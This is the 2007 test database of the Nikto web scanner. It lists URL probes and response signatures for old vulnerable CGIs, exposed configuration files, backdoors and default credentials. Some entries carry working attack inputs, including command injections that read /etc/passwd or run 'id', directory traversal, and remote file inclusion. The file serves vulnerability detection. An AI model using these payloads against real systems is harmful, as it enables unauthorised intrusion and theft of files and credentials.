#VERSION,2.000
#LASTMOD,11.10.2007 
# http://www.cirt.net

# This file may only be distributed and used with the full Nikto package.
# This file may not be used with any software product without written permission from CIRT, Inc.
# (c) 2007 CIRT, Inc., All Rights Reserved.

# By sending any database updates to CIRT, Inc., it is assumed that you
# grant CIRT, Inc., the unlimited, non-exclusive right to reuse, modify and relicense the changes.

"000001","0","b","/TiVoConnect?Command=QueryServer","GET","Calypso Server","","","","","The Tivo Calypso server is running. This page will display the version and platform it is running on. Other URLs may allow download of media.","",""
"000002","0","b","/TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes","GET","TiVoContainer","","","","","TiVo client service is running and may allow download of mp3 or jpg files.","",""
"000003","0","1234576890ab","@CGIDIRScart32.exe","GET","200","","","","","request cart32.exe/cart32clientlist","",""
"000004","0","1234576890ab","@CGIDIRSclassified.cgi","GET","200","","","","","Check Phrack 55 for info by RFP","",""
"000005","0","1234576890ab","@CGIDIRSdownload.cgi","GET","200","","","","","v1 by Matt Wright; check info in Phrack 55 by RFP","",""
"000006","0","1234576890ab","@CGIDIRSflexform.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, allows to append info to writable files.","",""
"000007","0","1234576890ab","@CGIDIRSflexform","GET","200","","","","","Check Phrack 55 for info by RFP, allows to append info to writable files.","",""
"000008","0","1234576890ab","@CGIDIRSlwgate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7","",""
"000009","0","1234576890ab","@CGIDIRSLWGate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7","",""
"000010","0","1234576890ab","@CGIDIRSlwgate","GET","200","","","","","Check Phrack 55 for info by RFP","",""
"000011","0","1234576890ab","@CGIDIRSLWGate","GET","200","","","","","Check Phrack 55 for info by RFP","",""
"000012","0","1234576890ab","@CGIDIRSperlshop.cgi","GET","200","","","","","v3.1 by ARPAnet.com; check info in Phrack 55 by RFP","",""
"000013","0","1234576890ab","/cfappman/index.cfm","GET","200","not found","","","","susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","",""
"000014","0","1234576890ab","/cfdocs/examples/cvbeans/beaninfo.cfm","GET","200","not found","","","","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","",""
"000015","0","1234576890ab","/cfdocs/examples/parks/detail.cfm","GET","200","not found","","","","susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm","",""
"000016","0","1234576890ab","/kboard/","GET","200","","","","","KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php","",""
"000017","0","1234576890ab","/lists/admin/","GET","200","","","","","PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist","",""
"000018","0","1234576890ab","/splashAdmin.php","GET","200","","","","","Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely."," ",""
"000019","0","1234576890ab","/ssdefs/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","",""
"000020","0","1234576890ab","/sshome/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","",""
"000021","0","1234576890ab","/tiki/","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","",""
"000022","0","1234576890ab","/tiki/tiki-install.php","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","",""
"000023","0","1234576890ab","/scripts/samples/details.idc","GET","200","","","","","See RFP 9901; www.wiretrip.net","",""
"000024","396","6","/_vti_bin/shtml.exe","GET","200","","","","","Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.","",""
"000025","0","1","@CGIDIRShandler.cgi","GET","200","","","","","Variation of Irix Handler? Has been seen from other CGI scanners.","",""
"000026","0","28","@CGIDIRSfinger","GET","200","","","","","finger other users, may be other commands?","",""
"000027","0","28","@CGIDIRSfinger.pl","GET","200","","","","","finger other users, may be other commands?","",""
"000028","0","3","@CGIDIRSformmail.cgi","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","",""
"000029","0","3","@CGIDIRSformmail.pl","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","",""
"000030","0","3","@CGIDIRSformmail","GET","Version ","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","",""
"000031","0","3","@CGIDIRSget32.exe","GET","200","","","","","This can allow attackers to execute arbitrary commands remotely.","",""
"000032","0","3","@CGIDIRSgm-authors.cgi","GET","200","","","","","GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","",""
"000033","0","3","@CGIDIRSguestbook/passwd","GET","200","","","","","GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.","",""
"000034","3233","3","@CGIDIRShorde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","",""
"000035","0","3","@CGIDIRSphoto/protected/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.","",""
"000036","0","3","@CGIDIRSwrap.cgi","GET","200","","","","","possible variation: comes with IRIX 6.2; allows to view directories","",""
"000037","0","3","/./","GET","include\(\"","","","","","Appending '/./' to a directory may reveal php source code.","",""
"000038","637","23","/~root/","GET","200","","","","","Allowed to browse root's home directory.","",""
"000039","0","3","/cgi-bin/wrap","GET","200","","","","","comes with IRIX 6.2; allows to view directories","",""
"000040","0","3","/forums/@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","",""
"000041","0","3","/forums/config.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","",""
"000042","0","3","/ganglia/","GET","Cluster","","","","","Ganglia Cluster reports reveal detailed information.","",""
"000043","0","3","/guestbook/guestbookdat","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.","",""
"000044","0","3","/guestbook/pwd","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.","",""
"000045","0","3","/help/","GET","200","","","","","Help directory should not be accessible","",""
"000046","0","3","/hola/admin/cms/htmltags.php?datei=./sec/data.php","GET","200","","","","","hola-cms-1.2.9-10 may reveal the administrator ID and password.","",""
"000047","0","3","/horde/imp/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","",""
"000048","3233","3","/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","",""
"000049","3233","3","/imp/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","",""
"000050","0","3","/imp/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","",""
"000051","0","3","/index.html.bak","GET","Index of","","","","","The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.","",""
"000052","0","3","/index.html~","GET","Index of","","","","","The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.","",""
"000053","621","7","/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc","GET","resolv.conf","","","","","phpMyExplorer Allows attackers to read directories on the server.","",""
"000054","0","23","/global.inc","GET","200","","","","","PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php","",""
"000055","0","3b","@CGIDIRSformmail.pl","GET","200","","","","","Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.","",""
"000056","0","3b","@CGIDIRShorde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","",""
"000057","0","4","/inc/common.load.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected, and may contain remote source injection by using the 'prefix' variable.","",""
"000058","0","4","/inc/config.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected, and may contain remote source injection by using the 'prefix' variable.","",""
"000059","0","4","/inc/dbase.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected, and may contain remote source injection by using the 'prefix' variable.","",""
"000060","0","6","@CGIDIRSvisadmin.exe","GET","200","","","","","This CGI allows attacker to crash the web server. Remove it from the CGI directory.","",""
"000061","0","7","@CGIDIRShtml2chtml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","",""
"000062","0","7","@CGIDIRShtml2wml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","",""
"000063","358","7","@CGIDIRSpollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00","GET","root:","","","","","Poll_It_SSI_v2.0.cgi allows attackers to retrieve arbitrary files.","",""
"000064","0","8","@CGIDIRSecho.bat?&dir+c:\",","GET","200","","","","","This batch file may allow attackers to execute remote commands.","",""
"000065","0","8","@CGIDIRSexcite;IFS=\"$\";/bin/cat /etc/passwd","GET","root:","200","","","","Excite software is vulnerable to command execution.","",""
"000066","0","8","@CGIDIRSezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|","GET","200","","","","","EZShopper loadpage CGI command execution","",""
"000067","0","8","@CGIDIRSguestbook.cgi","GET","200","","","","","May allow attackers to execute commands as the web daemon.","",""
"000068","0","8","@CGIDIRSguestbook.pl","GET","200","","","","","May allow attackers to execute commands as the web daemon.","",""
"000069","0","8","@CGIDIRSss","GET","200","","","","","Mediahouse Statistics Server may allow attacker to execute remote commands. Upgrade to latest version or remove from the CGI directory.","",""
"000070","0","8","/forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"","GET","uid=0","","","","","VBulletin forumdisplay.php remote command execution. BID-12542","",""
"000071","0","8","/guestbook/guestbook.html","GET","Jason Maloney","","","","","Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01","",""
"000072","0","8","/html/cgi-bin/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","",""
"000073","0","9","/geeklog/users.php","GET","200","","","","","Geeklog prior to 1.3.8-1sr2 contain a SQL injection vulnerability that lets a remote attacker reset admin password.","",""
"000074","0","a","/gb/index.php?login=true","GET","200","","","","","gBook may allow admin login by setting the value 'login' equal to 'true'.","",""
"000075","0","a","/guestbook/admin.php","GET","200","","","","","Guestbook admin page available without authentication.","",""
"000076","0","b","@CGIDIRSgH.cgi","GET","200","","","","","web backdoor by gH","",""
"000077","0","b","@CGIDIRSgm-cplog.cgi","GET","200","","","","","GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","",""
"000078","0","b","/getaccess","GET","200","","","","","This may be an indication that the server is running getAccess for SSO","",""
"000079","0","b","/help.html","GET","nice little interface into SPIKE","","","","","SPIKE Proxy may be running. Try using this port as a proxy, and see http://www.immunitysec.com/",".",""
"000080","0","3b","@CGIDIRSgm.cgi","GET","200","","","","","GreyMatter blogger may reveal user ids/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.","",""
"000081","0","c","/filemanager/filemanager_forms.php","GET","200","","","","","Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info","",""
"000082","0","1","@CGIDIRSAT-admin.cgi","GET","200","","","","","Admin interface...","",""
"000083","0","23","@CGIDIRSauth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","",""
"000084","0","23","@CGIDIRSawstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","",""
"000085","0","23","@CGIDIRSawstats/awstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","",""
"000086","0","23b","@CGIDIRSblog/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","",""
"000087","0","3","@CGIDIRScart.pl?db='","GET","c:\",","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","",""
"000088","0","3","@CGIDIRScart.pl?db='","GET","d:\",","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","",""
"000089","292","3","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","GET","ht:\/\/Dig","","","","","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.","",""
"000090","0","3","@CGIDIRSmt-static/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, perl version, and modules.","",""
"000091","0","3","@CGIDIRSmt/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, perl version, and modules.","",""
"000092","0","3","/cfdocs/expeval/openfile.cfm","GET","200","","","","","Can use to expose the system/server path.","",""
"000093","0","3","/index.php/123","GET","Premature end of script headers","","","","","Some versions of PHP reveal PHP's physical path on the server by appending /123 to the php file name.","",""
"000094","7510","3","/mambo/index.php?Itemid=JUNK(5)","GET","exceeded in /","","","","","Mambo Site Server 4.0.11 reveals the web server path.","",""
"000095","23654","3","/profile.php?u=JUNK(8)","GET","Warning:","","","","","Powerboards is vulnerable to path disclosure.","",""
"000096","0","3","/ticket.php?id=99999","GET","expects first argument","","","","","ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.","",""
"000097","0","3","/vgn/login/1,501,,00.html?cookieName=x--\>","GET","value=\"x--","","","","","Vignette server may leak memory with an invalid request. Upgrade to the latest version.","",""
"000098","0","3","/a%5c.aspx","GET","Invalid file name for monitoring:","","","","","Older Microsoft .NET installations allow full path disclosure.","",""
"000099","0","7","@CGIDIRSbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","",""
"000100","0","7","@CGIDIRSbannereditor.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","",""
"000101","599","7","@CGIDIRSbook.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","",""
"000102","0","7","/admin/browse.asp?FilePath=c:\&Opt=2&level=0","GET","winnt","","","","","Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely.","",""
"000103","0","8","@CGIDIRSarchitext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","",""
"000104","0","8","@CGIDIRSbizdb1-search.cgi","GET","200","","","","","This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm","",""
"000105","0","b","@CGIDIRSblog/","GET","200","","","","","A blog was found. May contain security problems in CGIs, weak passwords, and more.","",""
"000106","0","b","/tsweb/","GET","200","","","","","Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html","",""
"000107","0","1b","@CGIDIRSblog/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","",""
"000108","0","c","@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/","GET","http://xxxxxxxxxx/atk/","","","","","Achievo can be made to include php files from another domain. Upgrade to a new version.","",""
"000109","0","23","/vgn/performance/TMT","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000110","0","23","/vgn/performance/TMT/Report","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000111","0","23","/vgn/performance/TMT/Report/XML","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000112","0","23","/vgn/performance/TMT/reset","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000113","0","23","/vgn/ppstats","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000114","0","23","/vgn/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000115","0","23","/vgn/record/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000116","0","23","/vgn/stylepreviewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000117","0","23","/vgn/vr/Deleting","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000118","0","23","/vgn/vr/Editing","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000119","0","23","/vgn/vr/Saving","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000120","0","23","/vgn/vr/Select","GET","200","","","","","Vignette CMS admin/maintenance script available.","",""
"000121","0","23","/scripts/iisadmin/bdir.htr","GET","200","","","","","This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\<dirs> . MS02-028. CA-2002-09.","",""
"000122","0","2a","/scripts/iisadmin/ism.dll","GET","200","","","","","allows you to mount a brute force attack on passwords","",""
"000123","0","2a","/scripts/tools/ctss.idc","GET","200","","","","","This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.","",""
"000124","0","3","/bigconf.cgi","GET","200","","","","","BigIP Configuration CGI","",""
"000125","0","3","/billing/billing.apw","GET","PASS BOX CAPTION:","","","","","CoffeeCup password wizzard allows password files to be read remotely.","",""
"000126","0","3","/blah_badfile.shtml","GET","200","","","","","Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->",""
"000127","0","3","/blah-whatever-badfile.jsp","GET","Script /","","","","","The web server is configured to respond with the web server path when requesting a non-existent .jsp file.","",""
"000128","0","3","/vgn/style","GET","200","","","","","Vignette server may reveal system information through this file.","",""
"000129","0","3","/scripts/no-such-file.pl","GET","perl script","","","","","Using perl.exe allows attacker to view host info. Use perlis.dll instead.","",""
"000130","17653","3","/SiteServer/Admin/commerce/foundation/domain.asp","GET","200","","","","","Displays known domains of which that server is involved.","",""
"000131","17654","3","/SiteServer/Admin/commerce/foundation/driver.asp","GET","200","","","","","Displays a list of installed ODBC drivers.","",""
"000132","17655","3","/SiteServer/Admin/commerce/foundation/DSN.asp","GET","200","","","","","Displays all DSNs configured for selected ODBC drivers."," ",""
"000133","17652","3","/SiteServer/admin/findvserver.asp","GET","200","","","","","Gives a list of installed Site Server components.","",""
"000134","0","3","/SiteServer/Admin/knowledge/dsmgr/default.asp","GET","200","","","","","Used to view current search catalog configurations","",""
"000135","0","4","@CGIDIRScgiwrap/%3Cfont%20color=red%3E","GET","<font color=red>","","","","","cgiwrap allows HTML and possibly XSS injection. See http://archives.neohapsis.com/archives/bugtraq/2001-07/0499.html for details.","",""
"000136","0","4","@CGIDIRSmoin.cgi?test","GET","200","","","","","MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vuln.","",""
"000137","0","4","/autologon.html?10514","GET","200","","","","","Remotely Anywhere 5.10.415 is vulnerable to XSS attacks that can lead to cookie theft or privilege escalation. This is typically found on port 2000.","",""
"000138","0","4","/basilix/mbox-list.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page","",""
"000139","0","4","/basilix/message-read.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page","",""
"000140","0","4","/clusterframe.jsp","GET","200","","","","","Macromedia Jrun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","",""
"000141","0","4","/IlohaMail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","",""
"000142","0","8","/bb-dnbd/faxsurvey","GET","200","","","","","This may allow arbitrary command execution.","",""
"000143","0","8","/cartcart.cgi","GET","200","","","","","If this is Dansie shopping cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.","",""
"000144","0","8","/scripts/Carello/Carello.dll","GET","200","","","","","Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.","",""
"000145","0","a","/scripts/tools/dsnform.exe","GET","200","","","","","Allows creation of ODBC Data Source","",""
"000146","0","a","/scripts/tools/dsnform","GET","200","","","","","Allows creation of ODBC Data Source","",""
"000147","17656","a","/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp","GET","200","","","","","Used to create, modify, and potentially delete LDAP users and groups.","",""
"000148","17657","a","/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp","GET","200","","","","","Used to create, modify, and potentially delete LDAP users and groups.","",""
"000149","0","b","/prd.i/pgen/","GET","200","","","","","has MS Merchant Server 1.0","",""
"000150","0","b","/readme.eml","GET","200","","","","","Remote server may be infected with the Nimda virus.","",""
"000151","0","b","/scripts/httpodbc.dll","GET","200","","","","","Possible IIS backdoor found.","",""
"000152","0","b","/scripts/proxy/w3proxy.dll","GET","502","","","","","MSProxy v1.0 installed","",""
"000153","0","b","/scripts/root.exe?/c+dir+c:\+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","",""
"000154","0","b","/SiteServer/admin/","GET","403","","","","","SiteServer components admin. Default account may be 'LDAP_Anonymous', pass is 'LdapPassword_1'. see http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm","",""
"000155","0","1","/siteseed/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","",""
"000156","0","2","/scripts/samples/search/author.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file which should be  removed. MS01-033.","",""
"000157","0","2","/scripts/samples/search/filesize.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file which should be  removed. MS01-033.","",""
"000158","0","2","/scripts/samples/search/filetime.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file which should be  removed. MS01-033.","",""
"000159","0","2","/scripts/samples/search/queryhit.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file which should be  removed. MS01-033.","",""
"000160","0","2","/scripts/samples/search/simple.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file which should be  removed. MS01-033.","",""
"000161","0","23","/pccsmysqladm/incs/dbconnect.inc","GET","200","","","","","This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.","",""
"000162","0","23","/iisadmin/","GET","200","","","is restricted to Localhost","","Access to /iisadmin should be restricted to localhost or allowed hosts only.","",""
"000163","0","3","/password.inc","GET","globalpw","","","","","GTCatalog 0.9 admin password was retrieved remotely.","",""
"000164","0","3","/PDG_Cart/oder.log","GET","200","","","","","Shopping cart software log","",""
"000165","0","3","/web-console/ServerInfo.jsp%00","GET","<%=","","","","","jboss 3.2.1 with jetty seems to disclose source code.","",""
"000166","0","3","/global.asa","GET","RUNAT","","","","","The global.asa file was retrieved, which may contain sensitive information.  Map the .asa extension to the proper dll.","",""
"000167","0","23","/exchange/lib/AMPROPS.INC","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000168","0","23","/exchange/lib/DELETE.INC","GET","deleting objects","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000169","0","23","/exchange/lib/GETREND.INC","GET","GetRenderer functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000170","0","23","/exchange/lib/GETWHEN.INC","GET","functions to construct","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000171","0","23","/exchange/lib/JSATTACH.INC","GET","Attachment Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000172","0","23","/exchange/lib/JSROOT.INC","GET","Javascript Functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000173","0","23","/exchange/lib/JSUTIL.INC","GET","Common Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000174","0","23","/exchange/lib/LANG.INC","GET","localized strings","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000175","0","23","/exchange/lib/logon.inc","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000176","0","23","/exchange/lib/PAGEUTIL.INC","GET","functions that help","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000177","0","23","/exchange/lib/PUBFLD.INC","GET","Anonymous Published","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000178","0","23","/exchange/lib/RENDER.INC","GET","Rendering functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000179","0","23","/exchange/lib/SESSION.INC","GET","Session Management","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","",""
"000180","0","5","/ows/restricted%2eshow","GET","200","","","","","OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.","",""
"000181","0","5","/WEB-INF./web.xml","GET","200","","","","","Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l","",""
"000182","0","7","/view_source.jsp","GET","200","License Exception","","","","Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable.","",""
"000183","0","8","/w-agora/","GET","200","","","","","w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.","",""
"000184","0","a","/vider.php3","GET","200","","","","","MySimpleNews may allow deleting of news items without authentication.","",""
"000185","0","a","/exchange/root.asp?acs=anon","GET","/exchange/logonfrm.asp","","","","","This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc","",""
"000186","0","a","/officescan/cgi/cgiChkMasterPwd.exe","GET","200","","","","","Trend Officescan allows you to skip the login page and access soem CGI programs directly.","",""
"000187","0","b","/%NETHOOD%/","GET","Microsoft Windows Network","","","","","The machine may be infected with the Bugbear.B virus. http://www.f-secure.com/v-descs/bugbear_b.shtml","",""
"000188","0","d","@CGIDIRSastrocam.cgi","GET","200","","","","","Astrocam 1.4.1 contained buffer overflow BID-4684. Prior to 2.1.3 contained unspecified security bugs","",""
"000189","0","d","@CGIDIRSbadmin.cgi","GET","200","","","","","BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgrade.","",""
"000190","0","d","@CGIDIRSboozt/admin/index.cgi?section=5&input=1","GET","200","","","","","Boozt CGI may have a buffer overflow. Upgrade to a version new than 0.9.8alpha.","",""
"000191","0","d","@CGIDIRSezadmin.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","",""
"000192","0","d","@CGIDIRSezboard.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","",""
"000193","0","d","@CGIDIRSezman.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","",""
"000194","0","d","@CGIDIRSfoxweb.dll","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","",""
"000195","0","d","@CGIDIRSfoxweb.exe","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","",""
"000196","0","d","@CGIDIRSmgrqcgi","GET","200","","","","","This CGI from Magic Enterprise 8.30-5 and earlier are vulnerable to multiple buffer overflows. Upgrade to 9.x.","",""
"000197","0","d","@CGIDIRSwconsole.dll","GET","200","","","","","It may be possible to overflow this dll with 1024 bytes of data.","",""
"000198","0","d","@CGIDIRSwebplus.exe?about","GET","Product Information","","","","","Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Vers prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow.","",""
"000199","0","d","/pbserver/pbserver.dll","GET","200","","","","","This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/ms00-094.asp","",""
"000200","0","0","/administrator/gallery/uploadimage.php","GET","200","","","","","Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.","",""
"000201","0","0","/pafiledb/includes/team/file.php","GET","200","","","","","paFileDB 3.1 and below may allow file upload without authentication.","",""
"000202","0","0","/phpEventCalendar/file_upload.php","GET","200","","","","","phpEventCalendar 1.1 and prior vulnerable to file upload bug.","",""
"000203","0","0","/servlet/com.unify.servletexec.UploadServlet","GET","200","Error Occurred","","","","This servlet allows attackers to upload files to the server.","",""
"000204","0","0","/cgi-win/uploader.exe","GET","200","","","","","This CGI allows attackers to upload files to the server and then execute them.","",""
"000205","0","0","/scripts/cpshost.dll","GET","200","","","","","posting acceptor...possibly allows you to upload files","",""
"000206","0","0","/scripts/repost.asp","GET","Here is your upload status","","","","","This allows uploads to /users. Create /users and give web user read only access.","",""
"000207","0","0","/upload.asp","GET","200","","","","","An ASPpage that allows attackers to upload files to server","",""
"000208","0","0","/uploadn.asp","GET","200","","","","","An ASPpage that allows attackers to upload files to server","",""
"000209","0","0","/uploadx.asp","GET","200","","","","","An ASPpage that allows attackers to upload files to server","",""
"000210","0","0","/wa.exe","GET","200","","","","","An ASPpage that allows attackers to upload files to server","",""
"000211","0","1","/basilix/compose-attach.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains non descript security vulnerability in compose-attach.php3 related to attachment uploads","",""
